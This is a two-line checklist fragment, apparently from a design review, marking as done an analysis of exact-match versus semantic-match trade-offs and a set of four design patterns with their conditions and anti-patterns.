- [x] Trade-offs: analyzed the exact match vs. semantic match design trade-off
- [x] Reusability: four design patterns with applicable conditions and anti-patterns
